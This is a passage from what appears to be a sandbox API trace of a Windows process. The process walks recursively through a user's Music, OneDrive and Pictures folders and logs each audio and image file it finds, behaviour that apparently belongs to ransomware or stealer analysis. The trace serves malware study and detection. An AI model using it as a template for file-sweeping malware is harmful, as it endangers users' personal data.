ftLastAccessTime.dwHighDateTime=0x1d82435, ftLastWriteTime.dwLowDateTime=0x2109d9f0, ftLastWriteTime.dwHighDateTime=0x1d82435, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="8GJ8o0z9Qy_3x90hPI8", cAlternateFileName="8GJ8O0~1")) returned 1 [0256.746] FindNextFileW (in: hFindFile=0x8fe940, lpFindFileData=0x123a3120 | out: lpFindFileData=0x123a3120*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0256.746] FindClose (in: hFindFile=0x8fe940 | out: hFindFile=0x8fe940) returned 1 [0256.747] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Music\\Jbo1FZx\\KcRwHRb9GRYnTCwA\\Yjsf\\jvLuJscJOug\\ZvLJyDLOgo\\YibDx1iNotnzBWQf\\8GJ8o0z9Qy_3x90hPI8" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\jbo1fzx\\kcrwhrb9gryntcwa\\yjsf\\jvlujscjoug\\zvljydlogo\\yibdx1inotnzbwqf\\8gj8o0z9qy_3x90hpi8"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0256.747] FindFirstFileW (in: lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Music\\Jbo1FZx\\KcRwHRb9GRYnTCwA\\Yjsf\\jvLuJscJOug\\ZvLJyDLOgo\\YibDx1iNotnzBWQf\\8GJ8o0z9Qy_3x90hPI8\\*", lpFindFileData=0x123a2f90 | out: lpFindFileData=0x123a2f90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6aca7b40, ftCreationTime.dwHighDateTime=0x1d823e4, ftLastAccessTime.dwLowDateTime=0x2109d9f0, ftLastAccessTime.dwHighDateTime=0x1d82435, ftLastWriteTime.dwLowDateTime=0x2109d9f0, ftLastWriteTime.dwHighDateTime=0x1d82435, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x8fef40 [0256.747] FindNextFileW (in: hFindFile=0x8fef40, lpFindFileData=0x123a3010 | out: lpFindFileData=0x123a3010*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6aca7b40, ftCreationTime.dwHighDateTime=0x1d823e4, ftLastAccessTime.dwLowDateTime=0x2109d9f0, ftLastAccessTime.dwHighDateTime=0x1d82435, ftLastWriteTime.dwLowDateTime=0x2109d9f0, ftLastWriteTime.dwHighDateTime=0x1d82435, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0256.747] FindNextFileW (in: hFindFile=0x8fef40, lpFindFileData=0x123a3010 | out: lpFindFileData=0x123a3010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x402bcbc0, ftCreationTime.dwHighDateTime=0x1d8231f, ftLastAccessTime.dwLowDateTime=0x565afd40, ftLastAccessTime.dwHighDateTime=0x1d828cd, ftLastWriteTime.dwLowDateTime=0x565afd40, ftLastWriteTime.dwHighDateTime=0x1d828cd, nFileSizeHigh=0x0, nFileSizeLow=0x880, dwReserved0=0x0, dwReserved1=0x0, cFileName="7C-ulOQENOkPtsd-.mp3", cAlternateFileName="7C-ULO~1.MP3")) returned 1 [0256.747] FindNextFileW (in: hFindFile=0x8fef40, lpFindFileData=0x123a3010 | out: lpFindFileData=0x123a3010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfdd2b450, ftCreationTime.dwHighDateTime=0x1d819e1, ftLastAccessTime.dwLowDateTime=0x4282fb70, ftLastAccessTime.dwHighDateTime=0x1d827af, ftLastWriteTime.dwLowDateTime=0x4282fb70, ftLastWriteTime.dwHighDateTime=0x1d827af, nFileSizeHigh=0x0, nFileSizeLow=0x58a7, dwReserved0=0x0, dwReserved1=0x0, cFileName="BoCtyz6FCZp97BdAlRa6.wav", cAlternateFileName="BOCTYZ~1.WAV")) returned 1 [0256.747] FindNextFileW (in: hFindFile=0x8fef40, lpFindFileData=0x123a3010 | out: lpFindFileData=0x123a3010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7898df10, ftCreationTime.dwHighDateTime=0x1d82749, ftLastAccessTime.dwLowDateTime=0xad68a240, ftLastAccessTime.dwHighDateTime=0x1d82850, ftLastWriteTime.dwLowDateTime=0xad68a240, ftLastWriteTime.dwHighDateTime=0x1d82850, nFileSizeHigh=0x0, nFileSizeLow=0x994, dwReserved0=0x0, dwReserved1=0x0, cFileName="tTnyiBf8Er6HDgClHWhw.wav", cAlternateFileName="TTNYIB~1.WAV")) returned 1 [0256.747] FindNextFileW (in: hFindFile=0x8fef40, lpFindFileData=0x123a3010 | out: lpFindFileData=0x123a3010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd17d3b90, ftCreationTime.dwHighDateTime=0x1d8285b, ftLastAccessTime.dwLowDateTime=0x5a2c9880, ftLastAccessTime.dwHighDateTime=0x1d828ea, ftLastWriteTime.dwLowDateTime=0x5a2c9880, ftLastWriteTime.dwHighDateTime=0x1d828ea, nFileSizeHigh=0x0, nFileSizeLow=0x1d6b, dwReserved0=0x0, dwReserved1=0x0, cFileName="yjOkz_fxpa.wav", cAlternateFileName="YJOKZ_~1.WAV")) returned 1 [0256.747] FindNextFileW (in: hFindFile=0x8fef40, lpFindFileData=0x123a3010 | out: lpFindFileData=0x123a3010*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0256.748] FindClose (in: hFindFile=0x8fef40 | out: hFindFile=0x8fef40) returned 1 [0256.748] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Music\\Jbo1FZx\\KcRwHRb9GRYnTCwA\\Yjsf\\jvLuJscJOug\\pqkT0R1dikE" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\jbo1fzx\\kcrwhrb9gryntcwa\\yjsf\\jvlujscjoug\\pqkt0r1dike"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0256.748] FindFirstFileW (in: lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Music\\Jbo1FZx\\KcRwHRb9GRYnTCwA\\Yjsf\\jvLuJscJOug\\pqkT0R1dikE\\*", lpFindFileData=0x123a31b0 | out: lpFindFileData=0x123a31b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa47c0da0, ftCreationTime.dwHighDateTime=0x1d81af6, ftLastAccessTime.dwLowDateTime=0x9a4a0eb0, ftLastAccessTime.dwHighDateTime=0x1d81e19, ftLastWriteTime.dwLowDateTime=0x9a4a0eb0, ftLastWriteTime.dwHighDateTime=0x1d81e19, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x8fef40 [0256.749] FindNextFileW (in: hFindFile=0x8fef40, lpFindFileData=0x123a3230 | out: lpFindFileData=0x123a3230*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa47c0da0, ftCreationTime.dwHighDateTime=0x1d81af6, ftLastAccessTime.dwLowDateTime=0x9a4a0eb0, ftLastAccessTime.dwHighDateTime=0x1d81e19, ftLastWriteTime.dwLowDateTime=0x9a4a0eb0, ftLastWriteTime.dwHighDateTime=0x1d81e19, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0256.749] FindNextFileW (in: hFindFile=0x8fef40, lpFindFileData=0x123a3230 | out: lpFindFileData=0x123a3230*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x755988e0, ftCreationTime.dwHighDateTime=0x1d828c5, ftLastAccessTime.dwLowDateTime=0x70932df0, ftLastAccessTime.dwHighDateTime=0x1d82917, ftLastWriteTime.dwLowDateTime=0x70932df0, ftLastWriteTime.dwHighDateTime=0x1d82917, nFileSizeHigh=0x0, nFileSizeLow=0xf9f0, dwReserved0=0x0, dwReserved1=0x0, cFileName="6PknB4UT.wav", cAlternateFileName="")) returned 1 [0256.749] FindNextFileW (in: hFindFile=0x8fef40, lpFindFileData=0x123a3230 | out: lpFindFileData=0x123a3230*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8fe4db80, ftCreationTime.dwHighDateTime=0x1d81eaf, ftLastAccessTime.dwLowDateTime=0x36fc35b0, ftLastAccessTime.dwHighDateTime=0x1d82713, ftLastWriteTime.dwLowDateTime=0x36fc35b0, ftLastWriteTime.dwHighDateTime=0x1d82713, nFileSizeHigh=0x0, nFileSizeLow=0xca1f, dwReserved0=0x0, dwReserved1=0x0, cFileName="GtPsnmjRu_gpfrBo.wav", cAlternateFileName="GTPSNM~1.WAV")) returned 1 [0256.749] FindNextFileW (in: hFindFile=0x8fef40, lpFindFileData=0x123a3230 | out: lpFindFileData=0x123a3230*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x24e3ae10, ftCreationTime.dwHighDateTime=0x1d8234b, ftLastAccessTime.dwLowDateTime=0xc75e2f0, ftLastAccessTime.dwHighDateTime=0x1d829ed, ftLastWriteTime.dwLowDateTime=0xc75e2f0, ftLastWriteTime.dwHighDateTime=0x1d829ed, nFileSizeHigh=0x0, nFileSizeLow=0xe82e, dwReserved0=0x0, dwReserved1=0x0, cFileName="t8_9l3f-.mp3", cAlternateFileName="")) returned 1 [0256.749] FindNextFileW (in: hFindFile=0x8fef40, lpFindFileData=0x123a3230 | out: lpFindFileData=0x123a3230*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0256.749] FindClose (in: hFindFile=0x8fef40 | out: hFindFile=0x8fef40) returned 1 [0256.749] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Music\\Jbo1FZx\\KcRwHRb9GRYnTCwA\\w158lXmEu7fV" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\jbo1fzx\\kcrwhrb9gryntcwa\\w158lxmeu7fv"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0256.750] FindFirstFileW (in: lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Music\\Jbo1FZx\\KcRwHRb9GRYnTCwA\\w158lXmEu7fV\\*", lpFindFileData=0x123a33d0 | out: lpFindFileData=0x123a33d0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4db9f7a0, ftCreationTime.dwHighDateTime=0x1d82426, ftLastAccessTime.dwLowDateTime=0xf199a8a0, ftLastAccessTime.dwHighDateTime=0x1d82545, ftLastWriteTime.dwLowDateTime=0xf199a8a0, ftLastWriteTime.dwHighDateTime=0x1d82545, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x8febc0 [0256.750] FindNextFileW (in: hFindFile=0x8febc0, lpFindFileData=0x123a3450 | out: lpFindFileData=0x123a3450*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4db9f7a0, ftCreationTime.dwHighDateTime=0x1d82426, ftLastAccessTime.dwLowDateTime=0xf199a8a0, ftLastAccessTime.dwHighDateTime=0x1d82545, ftLastWriteTime.dwLowDateTime=0xf199a8a0, ftLastWriteTime.dwHighDateTime=0x1d82545, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0256.750] FindNextFileW (in: hFindFile=0x8febc0, lpFindFileData=0x123a3450 | out: lpFindFileData=0x123a3450*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc9ba57f0, ftCreationTime.dwHighDateTime=0x1d828f9, ftLastAccessTime.dwLowDateTime=0xedeb6e60, ftLastAccessTime.dwHighDateTime=0x1d8290e, ftLastWriteTime.dwLowDateTime=0xedeb6e60, ftLastWriteTime.dwHighDateTime=0x1d8290e, nFileSizeHigh=0x0, nFileSizeLow=0xb226, dwReserved0=0x0, dwReserved1=0x0, cFileName="B03VQSoNR.wav", cAlternateFileName="B03VQS~1.WAV")) returned 1 [0256.750] FindNextFileW (in: hFindFile=0x8febc0, lpFindFileData=0x123a3450 | out: lpFindFileData=0x123a3450*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc2eede20, ftCreationTime.dwHighDateTime=0x1d8252d, ftLastAccessTime.dwLowDateTime=0x4644c630, ftLastAccessTime.dwHighDateTime=0x1d829a3, ftLastWriteTime.dwLowDateTime=0x4644c630, ftLastWriteTime.dwHighDateTime=0x1d829a3, nFileSizeHigh=0x0, nFileSizeLow=0x117cb, dwReserved0=0x0, dwReserved1=0x0, cFileName="J_R4xdyvB0.mp3", cAlternateFileName="J_R4XD~1.MP3")) returned 1 [0256.750] FindNextFileW (in: hFindFile=0x8febc0, lpFindFileData=0x123a3450 | out: lpFindFileData=0x123a3450*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0256.750] FindClose (in: hFindFile=0x8febc0 | out: hFindFile=0x8febc0) returned 1 [0256.751] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\OneDrive" (normalized: "c:\\users\\rdhj0cnfevzx\\onedrive"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0256.751] FindFirstFileW (in: lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\OneDrive\\*", lpFindFileData=0x123a3700 | out: lpFindFileData=0x123a3700*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x84ac775d, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x84aeda3c, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x84aeda3c, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x8fec00 [0256.758] FindNextFileW (in: hFindFile=0x8fec00, lpFindFileData=0x123a3780 | out: lpFindFileData=0x123a3780*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x84ac775d, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x84aeda3c, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x84aeda3c, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0256.758] FindNextFileW (in: hFindFile=0x8fec00, lpFindFileData=0x123a3780 | out: lpFindFileData=0x123a3780*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0x84aeda3c, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x84aeda3c, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x84aeda3c, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x67, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0256.758] FindNextFileW (in: hFindFile=0x8fec00, lpFindFileData=0x123a3780 | out: lpFindFileData=0x123a3780*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0256.758] FindClose (in: hFindFile=0x8fec00 | out: hFindFile=0x8fec00) returned 1 [0256.758] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Pictures" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0256.758] FindFirstFileW (in: lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Pictures\\*", lpFindFileData=0x123a3700 | out: lpFindFileData=0x123a3700*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3ceb0231, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0xf7bfe63b, ftLastAccessTime.dwHighDateTime=0x1d82a28, ftLastWriteTime.dwLowDateTime=0xf7bfe63b, ftLastWriteTime.dwHighDateTime=0x1d82a28, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x8feb40 [0256.759] FindNextFileW (in: hFindFile=0x8feb40, lpFindFileData=0x123a3780 | out: lpFindFileData=0x123a3780*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3ceb0231, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0xf7bfe63b, ftLastAccessTime.dwHighDateTime=0x1d82a28, ftLastWriteTime.dwLowDateTime=0xf7bfe63b, ftLastWriteTime.dwHighDateTime=0x1d82a28, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0256.759] FindNextFileW (in: hFindFile=0x8feb40, lpFindFileData=0x123a3780 | out: lpFindFileData=0x123a3780*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7cd71280, ftCreationTime.dwHighDateTime=0x1d826dc, ftLastAccessTime.dwLowDateTime=0xd5beed70, ftLastAccessTime.dwHighDateTime=0x1d8281a, ftLastWriteTime.dwLowDateTime=0xd5beed70, ftLastWriteTime.dwHighDateTime=0x1d8281a, nFileSizeHigh=0x0, nFileSizeLow=0x14ffe, dwReserved0=0x0, dwReserved1=0x0, cFileName="0ue1Rq8s_.bmp", cAlternateFileName="0UE1RQ~1.BMP")) returned 1 [0256.759] FindNextFileW (in: hFindFile=0x8feb40, lpFindFileData=0x123a3780 | out: lpFindFileData=0x123a3780*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x2b0e752d, ftCreationTime.dwHighDateTime=0x1d70504, ftLastAccessTime.dwLowDateTime=0x2b10dbc5, ftLastAccessTime.dwHighDateTime=0x1d70504, ftLastWriteTime.dwLowDateTime=0x2b10dbc5, ftLastWriteTime.dwHighDateTime=0x1d70504, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Camera Roll", cAlternateFileName="CAMERA~1")) returned 1 [0256.759] FindNextFileW (in: hFindFile=0x8feb40, lpFindFileData=0x123a3780 | out: lpFindFileData=0x123a3780*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x435fd682, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x435fd682, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x436238c4, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x1f8, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0256.759] FindNextFileW (in: hFindFile=0x8feb40, lpFindFileData=0x123a3780 | out: lpFindFileData=0x123a3780*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x83cd30f0, ftCreationTime.dwHighDateTime=0x1d822b4, ftLastAccessTime.dwLowDateTime=0x9b404010, ftLastAccessTime.dwHighDateTime=0x1d82a02, ftLastWriteTime.dwLowDateTime=0x9b404010, ftLastWriteTime.dwHighDateTime=0x1d82a02, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="eDM5D-EmY4", cAlternateFileName="EDM5D-~1")) returned 1 [0256.759] FindNextFileW (in: hFindFile=0x8feb40, lpFindFileData=0x123a3780 | out: lpFindFileData=0x123a3780*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x427bd220, ftCreationTime.dwHighDateTime=0x1d81b0f, ftLastAccessTime.dwLowDateTime=0xeb24e40, ftLastAccessTime.dwHighDateTime=0x1d825e3, ftLastWriteTime.dwLowDateTime=0xeb24e40, ftLastWriteTime.dwHighDateTime=0x1d825e3, nFileSizeHigh=0x0, nFileSizeLow=0x618a, dwReserved0=0x0, dwReserved1=0x0, cFileName="fz05L0c.gif", cAlternateFileName="")) returned 1 [0256.759] FindNextFileW (in: hFindFile=0x8feb40, lpFindFileData=0x123a3780 | out: lpFindFileData=0x123a3780*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf409c520, ftCreationTime.dwHighDateTime=0x1d8240f, ftLastAccessTime.dwLowDateTime=0xf0989de0, ftLastAccessTime.dwHighDateTime=0x1d829db, ftLastWriteTime.dwLowDateTime=0xf0989de0, ftLastWriteTime.dwHighDateTime=0x1d829db, nFileSizeHigh=0x0, nFileSizeLow=0xde6d, dwReserved0=0x0, dwReserved1=0x0, cFileName="jLkeKBBsG2Mfojro.bmp", cAlternateFileName="JLKEKB~1.BMP")) returned 1 [0256.759] FindNextFileW (in: hFindFile=0x8feb40, lpFindFileData=0x123a3780 | out: lpFindFileData=0x123a3780*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x2b1a6533, ftCreationTime.dwHighDateTime=0x1d70504, ftLastAccessTime.dwLowDateTime=0x2b1a6533, ftLastAccessTime.dwHighDateTime=0x1d70504, ftLastWriteTime.dwLowDateTime=0x2b1a6533, ftLastWriteTime.dwHighDateTime=0x1d70504, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Saved Pictures", cAlternateFileName="SAVEDP~1")) returned 1 [0256.759] FindNextFileW (in: hFindFile=0x8feb40, lpFindFileData=0x123a3780 | out: lpFindFileData=0x123a3780*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x11dd970, ftCreationTime.dwHighDateTime=0x1d81d8c, ftLastAccessTime.dwLowDateTime=0x70101530, ftLastAccessTime.dwHighDateTime=0x1d8253b, ftLastWriteTime.dwLowDateTime=0x70101530, ftLastWriteTime.dwHighDateTime=0x1d8253b, nFileSizeHigh=0x0, nFileSizeLow=0xa639, dwReserved0=0x0, dwReserved1=0x0, cFileName="TwlVh5-7kS4lpqivPrW.bmp", cAlternateFileName="TWLVH5~1.BMP")) returned 1 [0256.759] FindNextFileW (in: hFindFile=0x8feb40, lpFindFileData=0x123a3780 | out: lpFindFileData=0x123a3780*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1daa3230, ftCreationTime.dwHighDateTime=0x1d81cf8, ftLastAccessTime.dwLowDateTime=0x1ee9afc0, ftLastAccessTime.dwHighDateTime=0x1d82119, ftLastWriteTime.dwLowDateTime=0x1ee9afc0, ftLastWriteTime.dwHighDateTime=0x1d82119, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="wW1ws0e", cAlternateFileName="")) returned 1 [0256.759] FindNextFileW (in: hFindFile=0x8feb40, lpFindFileData=0x123a3780 | out: lpFindFileData=0x123a3780*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0256.759] FindClose (in: hFindFile=0x8feb40 | out: hFindFile=0x8feb40) returned 1 [0256.759] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Pictures\\Camera Roll" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\camera roll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0256.760] FindFirstFileW (in: lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Pictures\\Camera Roll\\*", lpFindFileData=0x123a35f0 | out: lpFindFileData=0x123a35f0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x2b0e752d, ftCreationTime.dwHighDateTime=0x1d70504, ftLastAccessTime.dwLowDateTime=0x2b10dbc5, ftLastAccessTime.dwHighDateTime=0x1d70504, ftLastWriteTime.dwLowDateTime=0x2b10dbc5, ftLastWriteTime.dwHighDateTime=0x1d70504, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x8fe900 [0256.761] FindNextFileW (in: hFindFile=0x8fe900, lpFindFileData=0x123a3670 | out: lpFindFileData=0x123a3670*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x2b0e752d, ftCreationTime.dwHighDateTime=0x1d70504, ftLastAccessTime.dwLowDateTime=0x2b10dbc5, ftLastAccessTime.dwHighDateTime=0x1d70504, ftLastWriteTime.dwLowDateTime=0x2b10dbc5, ftLastWriteTime.dwHighDateTime=0x1d70504, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0256.761] FindNextFileW (in: hFindFile=0x8fe900, lpFindFileData=0x123a3670 | out: lpFindFileData=0x123a3670*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0x2b10dbc5, ftCreationTime.dwHighDateTime=0x1d70504, ftLastAccessTime.dwLowDateTime=0x2b10dbc5, ftLastAccessTime.dwHighDateTime=0x1d70504, ftLastWriteTime.dwLowDateTime=0x2b10dbc5, ftLastWriteTime.dwHighDateTime=0x1d70504, nFileSizeHigh=0x0, nFileSizeLow=0xbe, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0256.761] FindNextFileW (in: hFindFile=0x8fe900, lpFindFileData=0x123a3670 | out: lpFindFileData=0x123a3670*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0256.761] FindClose (in: hFindFile=0x8fe900 | out: hFindFile=0x8fe900) returned 1 [0256.761] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Pictures\\Saved Pictures" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\saved pictures"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0256.761] FindFirstFileW (in: lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Pictures\\Saved Pictures\\*", lpFindFileData=0x123a35f0 | out: lpFindFileData=0x123a35f0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x2b1a6533, ftCreationTime.dwHighDateTime=0x1d70504, ftLastAccessTime.dwLowDateTime=0x2b1a6533, ftLastAccessTime.dwHighDateTime=0x1d70504, ftLastWriteTime.dwLowDateTime=0x2b1a6533, ftLastWriteTime.dwHighDateTime=0x1d70504, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, 